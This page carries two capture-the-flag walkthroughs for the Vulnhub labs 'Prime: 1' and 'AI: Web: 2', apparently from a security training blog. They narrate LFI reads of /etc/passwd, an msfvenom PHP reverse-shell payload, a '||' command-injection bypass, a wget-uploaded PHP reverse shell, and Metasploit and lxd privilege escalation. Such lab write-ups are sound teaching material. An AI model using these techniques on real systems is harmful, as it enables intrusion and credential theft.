Prime: 1 Vulnhub Walkthrough

Prime: 1 Vulnhub Walkthrough

Prime writeup- our other CTF challenges for CTF players and it can be download from vulnhub from here. The credit goes to “Suraj Pandey” for designing this VM machine for beginners. This is a Linux based CTF challenge where you can use your basic pentest skill to compromise this VM to escalate the root privilege shell.
The difficulty level of lab is set easy to intermediate at the phase of initial foothold and once the machine is get compromised the privilege escalation phase is very easy. To capture the flag, you need to find user.txt and root.txt file.

Penetration Testing Methodologies
Network Scan
·         Netdiscover
·         Nmap
·         Abusing web application
·         Dirb
·         fuzzing
·         LFI
·         Abusing Wordpress
·         Injecting PHP reverse shell payload
·         Obtain Meterpreter Session
·         Capture the Flag user.txt
Privilege Escalation
·         Kernel Exploit (Metasploit)
·         Capture the Flag root.txt


Network Scanning
This CTF is started to run on a virtual box, so use a virtual box to run this machine. We've got a few hints at the initial phase when the host machine starts up.
We notice following:
·         The VM is desgin on “ubuntu 16.04
·         Found a username: “victor
·         Hint for Password.txt file “find password.txt file in my directory

Time to identify the IP of the host machine with the help of netdiscover. Here we have as an IP host on my network, let's go further to scan the victim's network to identify the open port and services running across it.

Using an aggressive nmap scan, we only found two open ports, i.e. 22 for ssh and 80 for http.
nmap -A

Further, we need to start enumeration against the host machine, therefore without wasting time, we navigate to web browser for exploring HTTP service but we didn’t found any thing here.

Then we go to the web directory listing and use the starting directory brute force with the help of dirb. Hmmmm!! Shows two interesting directories, /dev & /WordPress, which means that the host uses the WordPress application.

Lol! By exploring /dev directory we got a message and that it wasn't useful

We further explored /WordPress and found the WordPress welcome page. When you browse this page, you will also find the username "Victor" which means that the victor could be the admin.

Then we dig further but didn't find anything, so we're using dirb again to list .txt extension files, and fortunately we've found a secret.txt file out of the result.

Let’s go for secret.txt file and figure out what is this file has.

Hmmmm! The secert.xt file provided an indication for the github link and the location.txt file.

The github page contains a few commands for Fuzzing, we try to use each command, but it didn't work as if it was aspected. Then we notice "file" as a fuzzy payload that might be another hint, so we used it to fuzz.

So we try to navigate the following url as per hint, and this approach works as shown in the image below.
At the end of the web page, the author left us with a comment as a hint.

“Do something better
You are digging wrong file”

If you remember, we got a hint for the "location.txt" file from inside the secret.txt file. So we're trying to call the location.txt file with the given url.
Great!! We have been able to access the file location.txt, which means that it is vulnerable to local file inclusion (LFI). Let's try and take advantage of it.
Also location.txt file gave a hint us to use “secrettire360 as parameter on other php page”.

As per the above observation, we try to exploit LFI by executing the following command to extract / etc / password file.
Boom!! Boom!! And we've got the/etc/passwd file of the host machine. if you will notice below image here user: Saket is giving indication to look inside his directory i.e. /home/saket for password.txt file.

To get the password file we try to explore the following url:
And we found the password: follow_the_ippsec

It was time to utilized above enumerated credential for login into WordPress, we therefore try to access the WordPress admin console using the combination of victor: follow_the_ippsec.

After login into WordPress we try to inject malicious php script via theme templates or by installing new plugin, but all of them fail because they have no writable permission.

Providentially, we've seen a secret.php file that also has writeable permission, which means we can write our malicious php code here.

We therefore write use msfvenom following command for generating malicous php code in raw format.

msfveom -p php/meterpreter/reverse_tcp lhost= lport=4444 R

Then copied the higlighted code for injected inside secret.php page

So here, we've injected our malicious code and updated the file, and at the same time, we've started a multi-handler to get a backup of the host machine.

When everything is set up, we try to trigger our malicious php script by running the following url:

After executing above url we got meterpreter session1 which is limited shell access of host machine and here we found the kernel version, now lets go for post enumeration to find out user.txt file.

From inisde /home/saket we found our 1st flag user.txt file. Further let’s got for privilege escaltion to access root shell.

Privilege Escalation

As we already know the kernel version of the host therefore without wasting time we look for kernel exploit in the google and found the metasploit module for exploiting the kernel.

Thus we use following module:

msf > use exploit/linux/local/bpf_sign_extension_priv_esc
msf exploit(exploit/linux/local/bpf_sign_extension_priv_esc) > set session 1
msf exploit(exploit/linux/local/bpf_sign_extension_priv_esc) > exploit

Great!! we got another meterpreter session i.e session 2, and after that we get into the root directory and capture the final flag i.e. root.txt

AI: Web: 2 Vulnhub Walkthrough

Today we are going to solve another CTF challenge called “AI: Web: 2”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This is the second box from the series AI: Web. The credit for making this lab goes to Mohammad Ariful. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning
  • Netdiscover
  • Nmap

  • Browsing HTTP Service
  • Performing Directory Bruteforce
  • Enumerating robot.txt

  • Exploiting Directory Traversal
  • Crack password hashes using John The Ripper
  • Exploiting Command Injection to get a shell

Privilege Escalation
  • Enumerating exploit 46978
  • Enumerating for flag

Capture the flag


Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box.  After running the lab, we used the netdiscover command to check the IP Address of the lab.
This was found out to be

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.
nmap -A
We learned from the scan that we have the port 80 open which is hosting Apache httpd service. And we have the port 22 open which gives us the option to remotely connect to the target machine.
Since we got the port 80 open, we decided to browser the IP Address in the browser.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us a directory called webadmin as shown in the given image.

Upon finding the webadmin directory, we opened the URL in our browser. This gave us a Login Prompt. We don’t have any login credentials to proceed further here.
Back to the part, where we initially browsed the webpage, we found a signup option. We clicked that option. This gave us a form with the username option as shown in the image. So, we created a user account with the name “raj”.
On clicking the “OK” button, we get a panel as shown in the image given below. It shows us a welcome message “Welcome to XuezhuLi File Sharing”. This must be a service that is configured on the web server. This service seems interesting.

We googled the name of the service in hope to find any exploit. And we got the exploit db link.

On close inspection, we found that it contains a captured request marked as viewing.php. This shows the path that can be used to view the /etc/passwd on the target system.


So, we captured the request on our target machine using Burp Suite from the userpage.php.

Now we will right click here on the captured requested and select “Send to Repeater” option in the BurpSuite. Here we will change the GET request with the path that we found in the exploit earlier and send the request to get the response. Here we can see that the we have the /etc/passwd. Among all the other users, we found a user named aiweb2.

Even though, we have a user, we don’t have any passwords. We tried to crack the has by usual methods and dictionaries. It turned out to be useless. Then we turned to the Lab Description on the Vulnhub. Here we found a hint given by the lab author “You may need to crack password. Use wordlist SecLists/rockyou-45.txt”. So, we downloaded that wordlist and still tried to crack the hash.
You can download this wordlist by clicking here.
This also was of no use. We went on through research to find a move ahead and after hours and hours of googling and running through guides and manuals. We found that there are some credentials stored inside the /etc/apache2/.htpasswd.
We modified our request from earlier to go to this path as shown in the image.

This proved to be a successful step. We found a user named aiweb2admin. Now that we have the username and the password hash. We tried to crack the hash using John The Ripper. We downloaded the wordlist mentioned before by the author and named it dict.txt. On running John, The Ripper, we found the password to be “c.ronaldo”
john --wordlist=dict .txt hash.txt

We went back to the user login panel on /webadmin/ and entered the following credentials
Username: aiweb2admin
Password: c.ronaldo
This was a success. We found some text written here, It says” I disallowed some contents from robots.” This was a simple hint for robots.txt.

As we understood the lab author is trying to hide contents from robot. That means we need to enumerate the robots.txt. On the inspection of robots.txt, we found two directories.

We opened the /H05Tpin9555/, this gave us a form to enter the IP Address, and upon entering the IP Address, the Victim Machine will ping that particular IP Address. We tired and pinged And the result of the command is show in the image given below. This is a simple case of Command Injection Vulnerability.

We will get back to in a minute but we thought of enumerating further another directory hidden in the robots. txt, “/S0meextras/”. We tried multiple ways to enumerate but all we have is this message” For juicy information in this dir”. This means that there is something in this directory. But to access this directory, first we will be needing an access on this machine.

We got back to our command injection. Here after trying multiple ways and different filters, we found that double pipe ‘||’ bypasses the command injection. We tried the id command with double pipe as shown in the image.

Now that we have found our way in, we will use the php shell of pentest monkey to get a session over the target system. First, we will change the IP Address to our attacker machine (Kali).

After making the appropriate changes, we will run a python one liner to create a server on the port 8000. Now we will transfer the php shell to the target system with the wget command with the double pipe. After clicking the submit button, the shell will get uploaded as shown in the image.

Now that the shell is successfully uploaded, we need to execute it by browsing it in our web browser, but before doing that we will create a netcat listener using the command given below. Remember to enter the port number that was in the shell.php file.
nc -lvp 1234

As soon as we execute the shell file, we have a shell over the target system. We have found our way in. Now its time to enumerate that S0mextras directory. As the directory was visible on the outside as a webpage. It must be in the var/www/html/ directory. So, we traversed to that directory. Here we found a directory named webadmin. We entered into that directory to find out targeted directory. In that directory, we ran the ls -al command. We did this to find any hidden directories. Here we found a text file named “.sshUserCred55512.txt”. Upon opening it we found the credentials of a user on the remote system as shown in the given image.
cd var/www/html
cd webadmin
cd S0mextras
ls -al
cat .sshUserCred55512.txt

So, we decided to login using those credentials. Upon logging in we ran the id command to reveal the user permissions. This gave us a very peculiar information that the user is a member of lxd group.
LXD is a next gen system container manager. It offers the user a similar environment as virtual machines. But using Linux containers. For more information read this wiki.
ssh n0nr00tuser@

Privilege Escalation
We used the searchsploit to find any exploit related to lxd. And to our better knowledge, we got exactly what we wanted a privilege escalation exploit.
searchsploit lxd
searchsploit -m 46978
So, we downloaded the exploit using the (-m) parameter of the searchsploit command. After successfully downloading we opened the file to read using the cat command. Here we found the instruction of how to use the exploit.
So, we will follow these steps:

Step 1: Download build-alpine on Attacker Machine
So, we downloaded the build alpine using the link provided in the exploit.

Step 2: Build alpine as root user on Attacker Machine
After that we ran the alpine-build using the following command
bash build-alpine

On running the bash build command a tar.gz file is created in our working directory.


Step 3: Run this script and you will get root on the Victim Machine
Now we will transfer the file to the victim machine, we used the combination of python one liner and wget for this process. Now there seems to be some error in execution. What happens is that when we tried to execute this directly, we are not able execute it properly. But when we try this method, we are successful. We created a bash file named and copied the code in this file. After that we provided it with giving the file proper permission to execute. Now we run the file with providing the tar.gz file in parameter.
chmod 777
./ -f alpine-v3.10-x86_64-20190905_0123.tar.gz 
Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine.
After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the flag and found it. This concludes this lab.
cd /mnt/root/root
cat flag.txt